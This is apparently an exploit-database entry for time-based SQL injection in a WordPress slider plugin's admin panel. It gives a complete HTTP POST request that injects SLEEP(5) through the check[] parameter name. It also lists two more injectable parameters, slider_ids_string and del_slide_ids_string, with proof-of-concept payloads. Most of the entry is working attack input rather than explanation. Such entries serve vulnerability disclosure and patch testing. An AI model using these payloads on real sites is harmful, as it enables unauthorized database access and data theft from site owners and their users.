## https://sploitus.com/exploit?id=WPEX-ID:C1F45000-6C16-4606-BE80-1938A755AF2C
Vulnerable param: `check[]`
Vulnerable function: WDW_S_Library::get
```
POST /wp-admin/admin.php?page=sliders_wds HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 201
s=&bulk_action=duplicate&check%5BSLEEP(5)%5D=on&select_slider_merge=-select-&imagesexport=on&nonce_wd=e7f3386825&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dsliders_wds&task=duplicate¤t_id=
```
Other SQLi:
- File: admin/models/WDSModelWDSExport.php
- Function: export_full
- Params: slider_ids_string
- PoC: Insert one slider with id = 1 and set $slider_ids_string to string: 1) AND SLEEP(5
- File: admin/controllers/Sliders.php
- Function: save_slider_db
- Params: del_slide_ids_string
- PoC: Insert one slider with id = 1 and set $del_slide_ids_string to string: 1) AND SLEEP(5